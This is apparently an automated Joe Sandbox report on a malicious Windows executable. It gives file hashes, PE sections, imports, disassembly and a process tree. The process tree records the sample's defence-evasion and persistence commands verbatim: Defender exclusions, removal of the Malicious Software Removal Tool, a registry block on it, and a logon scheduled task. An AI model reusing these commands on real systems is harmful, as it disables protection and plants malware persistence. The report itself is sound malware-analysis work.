                                                                    https://tst-gameplayapi.intel.com/api/games/getagsgames2/ZSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/RSgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgSgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC5F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACCAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://gameplayapi.intel.com/api/games/getagsgames2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://gameplayapi.intel.com/api/games/getagsgames2/YSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543318
Start date and time: 2024-10-27 17:11:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected VM Detection
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Detection: MAL
Classification: mal100.evad.winEXE@27/6@0/0
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 65%
• Number of executed functions: 38
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.51.58.94
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, nexusrules.officeapps.live.com
• Execution Graph export aborted for target SppExtComObj.exe, PID 6848 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2172 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Time | Type | Description
12:14:59 | API Interceptor | 13x Sleep call for process: powershell.exe modified
17:15:54 | Task Scheduler | Run new task: TMPSYSUPD path: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe
                                                                                    No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:NlllulgkLZ:NllU
MD5: C1AA1D28144A13E317F3F4D85AC26B7D
SHA1: 2ADF74F16F1031DA80E1E096946EB8872F716876
SHA-256: EB50A98ECA168B1B64C7DB0C33AE77B83B84F492032BD1BCB26AFE571DBE2839
SHA-512: B92300874DD39C4304C852D59177D0E33A3A39D6ABB8DE5C86E9A2EC46268BC9E4AFD2BF3F1441D37F97E217EA296556EF2F9F62B346D0DDBF2EA9DB978B4CBE
Malicious: false
Preview: @...e.................................,..............@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: modified
Size (bytes): 706740224
Entropy (8bit): 0.5513533060255377
Encrypted: false
SSDEEP:
MD5: 43D7DA08F086122E16773B9002C05B1F
SHA1: 484CD5B23793F8CD32874CC4E9291D4466A78CA4
SHA-256: 55BC346754E52732D87752988BD73731AD5B5FC757D07F42721AE28A0D45A669
SHA-512: DF89E7F6D30BFE1502EA75933CEFAB49889662413EBA62249251A78B8B8A8505865A53787D887283FA218DA1D2BEFCFCF4D4F56EED3F458AF0E2DE2762FBD9EA
Malicious: true
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f..........".......!.........G ........@..........................................`..................................................e..|..............tm...............i...d......................0=..(...p..8............n..p............................text.....!.......!................. ..`.rdata.......!......!.............@..@.data...P..........................@....pdata..tm......n..................@..@.gfids.......`......."..............@..@.tls.........p.......$..............@....voltbl.*............&.................._RDATA...............(..............@..@.reloc...i.......j...*..............@..B................................................................................................................................................................................................................................................................
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.998781074062823
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
File size: 30'441'984 bytes
MD5: 330709f05491b4e01ddf2af087d4e4f3
SHA1: 0f94e0f3f7ef87df645847f84a94572192f5fc39
SHA256: 3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5
SHA512: a6711690ff220954737edc2b4d67177ca546b5a63ab3aec9ed18bfc545c81b379b3ed15c30e2abaa0d7b1ed7fc2a975468b14fc9ee57419f596a285312771170
SSDEEP: 786432:RQ3GVQWdr9hPRfORj1ThiEKjnQ9+6P/+BGfO2rtq8qD9RMo:RQWVQW9pfORj1diE+76n+oW4q8qhRM
TLSH: 4667330BF95284B8E026E4748669B622E7757C695B70B8EB17D18B312E2C7F1673DF00
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......x.....................@..........................................`........................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1400485a0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66FEF42E [Thu Oct 3 19:44:46 2024 UTC]
TLS Callbacks: 0x4002db50, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 1d294a89dfa5cccc79f25d6bb7b51ae4
Instruction (entrypoint disassembly)
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007F3C08BB3C70h
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    jmp 00007F3C08BB3887h
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007F3C08BB3A24h
                                                                                    dec eax
                                                                                    neg eax
                                                                                    sbb eax, eax
                                                                                    neg eax
                                                                                    dec eax
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    int3
                                                                                    inc eax
                                                                                    push ebx
                                                                                    dec eax
                                                                                    sub esp, 20h
                                                                                    dec eax
                                                                                    cmp dword ptr [01CBE426h], FFFFFFFFh
                                                                                    dec eax
                                                                                    mov ebx, ecx
                                                                                    jne 00007F3C08BB3A19h
                                                                                    call 00007F3C08BB57E5h
                                                                                    jmp 00007F3C08BB3A21h
                                                                                    dec eax
                                                                                    mov edx, ebx
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [01CBE410h]
                                                                                    call 00007F3C08BB5750h
                                                                                    xor edx, edx
                                                                                    test eax, eax
                                                                                    dec eax
                                                                                    cmove edx, ebx
                                                                                    dec eax
                                                                                    mov eax, edx
                                                                                    dec eax
                                                                                    add esp, 20h
                                                                                    pop ebx
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 18h
                                                                                    dec esp
                                                                                    mov eax, ecx
                                                                                    mov eax, 00005A4Dh
                                                                                    cmp word ptr [FFFB79E5h], ax
                                                                                    jne 00007F3C08BB3A8Ah
                                                                                    dec eax
                                                                                    arpl word ptr [FFFB7A18h], cx
                                                                                    dec eax
                                                                                    lea edx, dword ptr [FFFB79D5h]
                                                                                    dec eax
                                                                                    add ecx, edx
                                                                                    cmp dword ptr [ecx], 00004550h
                                                                                    jne 00007F3C08BB3A71h
                                                                                    mov eax, 0000020Bh
                                                                                    cmp word ptr [ecx+18h], ax
                                                                                    jne 00007F3C08BB3A66h
                                                                                    dec esp
                                                                                    sub eax, edx
                                                                                    movzx eax, word ptr [ecx+14h]
                                                                                    dec eax
                                                                                    lea edx, dword ptr [ecx+18h]
                                                                                    dec eax
                                                                                    add edx, eax
                                                                                    movzx eax, word ptr [ecx+06h]
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [eax+eax*4]
                                                                                    dec esp
                                                                                    lea ecx, dword ptr [edx+ecx*8]
                                                                                    dec eax
                                                                                    mov dword ptr [esp], edx
                                                                                    dec ecx
                                                                                    cmp edx, ecx
                                                                                    je 00007F3C08BB3A2Ah
                                                                                    mov ecx, dword ptr [edx+0Ch]
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d02d60 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d08000 | 0x1b90 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d0e000 | 0x714 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1d02c50 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1d004d0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1cfb800 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1d033e8 | 0x570 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x57606 | 0x57800 | a148eb2eada577f138089074ba679c53 | False | 0.5214313616071429 | data | 6.446985068319904 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x59000 | 0x1caceac | 0x1cad000 | c05283bf5f37013c9f8c660f4159f1a5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1d06000 | 0x1b80 | 0xa00 | 9430d65459707b6855176bd55563116c | False | 0.144140625 | , Bytes/sector 320, FATs 117, root entries 152, sectors 65280 (volumes <=32 MB), Media descriptor 0xff, sectors/FAT 65535, sectors/track 1, FAT (12 bit by descriptor) | 1.883377243480109 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d08000 | 0x1b90 | 0x1c00 | 801134451f2c3d12792668ccff527ed4 | False | 0.5108816964285714 | data | 5.766895627047478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids | 0x1d0a000 | 0x80 | 0x200 | 0fb07c8c886b6b01886b64ea41e002ae | False | 0.22265625 | data | 1.5017207702579478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x1d0b000 | 0xa1 | 0x200 | 2b3aead56f8cd1ad5cf40bdff60fc742 | False | 0.037109375 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.voltbl | 0x1d0c000 | 0x2a | 0x200 | eae09b4822d39f484dfe9175c88bb635 | False | 0.107421875 | data | 0.7001115316230119 |
_RDATA | 0x1d0d000 | 0xf4 | 0x200 | 96efb7e86d989761b7ebd5296750dfbb | False | 0.314453125 | data | 2.467690348409367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d0e000 | 0x714 | 0x800 | bffe6399af6e1c1832ce455184c13d1b | False | 0.55517578125 | data | 5.202617635946286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Imports

DLL | Import
KERNEL32.dll | AddVectoredExceptionHandler, CheckRemoteDebuggerPresent, CloseHandle, CompareStringOrdinal, CompareStringW, CreateDirectoryW, CreateFileW, CreateNamedPipeW, CreateProcessW, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DeleteProcThreadAttributeList, DuplicateHandle, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExA, FindFirstFileW, FindNextFileA, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFullPathNameW, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetProcessIoCounters, GetProcessTimes, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetSystemTimePreciseAsFileTime, GetSystemTimes, GetTickCount64, GetWindowsDirectoryW, GlobalMemoryStatusEx, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeProcThreadAttributeList, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, K32GetPerformanceInfo, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, LocalFree, MultiByteToWideChar, OpenProcess, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFileEx, ReadProcessMemory, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEnvironmentVariableA, SetFileInformationByHandle, SetFilePointerEx, SetLastError, SetStdHandle, SetThreadExecutionState, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UpdateProcThreadAttribute, VirtualQueryEx, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile, WriteFileEx
bcryptprimitives.dll | ProcessPrng
api-ms-win-core-synch-l1-2-0.dll | WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
ntdll.dll | NtQueryInformationProcess, NtQuerySystemInformation, NtWriteFile, RtlGetVersion, RtlNtStatusToDosError
ADVAPI32.dll | CopySid, GetLengthSid, GetTokenInformation, IsValidSid, OpenProcessToken, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, SystemFunction036
bcrypt.dll | BCryptGenRandom
powrprof.dll | CallNtPowerInformation
ole32.dll | CoCreateInstance, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, PropVariantClear
shell32.dll | CommandLineToArgvW, ShellExecuteExW
oleaut32.dll | GetErrorInfo, SafeArrayAccessData, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, SysFreeString, SysStringLen, VariantClear
psapi.dll | GetModuleFileNameExW
pdh.dll | PdhAddEnglishCounterW, PdhCloseQuery, PdhCollectQueryData, PdhGetFormattedCounterValue, PdhOpenQueryA, PdhRemoveCounter
propsys.dll | PropVariantToBSTR, VariantToPropVariant
                                                                                    No network behavior found

                                                                                    Target ID:5
                                                                                    Start time:12:13:56
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
                                                                                    Imagebase:0x7ff609900000
                                                                                    File size:30'441'984 bytes
                                                                                    MD5 hash:330709F05491B4E01DDF2AF087D4E4F3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:12:14:59
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
                                                                                    Imagebase:0x7ff649db0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:12:14:59
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:12:15:00
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff7ff000000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:15
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\wusa.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    Imagebase:0x7ff773500000
                                                                                    File size:316'416 bytes
                                                                                    MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 12:15:05
Start date: 27/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff77c580000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 20
Start time: 12:15:05
Start date: 27/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Imagebase: 0x7ff7bf9d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 21
Start time: 12:15:05
Start date: 27/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff77c580000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 12:15:05
Start date: 27/10/2024
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Imagebase: 0x7ff7a3220000
File size: 77'312 bytes
MD5 hash: 227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 12:15:36
Start date: 27/10/2024
Path: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe
Wow64 process (32bit): false
Commandline: "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Imagebase: 0x7ff684a80000
File size: 706'740'224 bytes
MD5 hash: 43D7DA08F086122E16773B9002C05B1F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 24
Start time: 12:15:42
Start date: 27/10/2024
Path: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Imagebase: 0x7ff6d9cf0000
File size: 706'740'224 bytes
MD5 hash: B22A88CB0DDC70FA01E392173505458C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 25
Start time: 12:15:52
Start date: 27/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
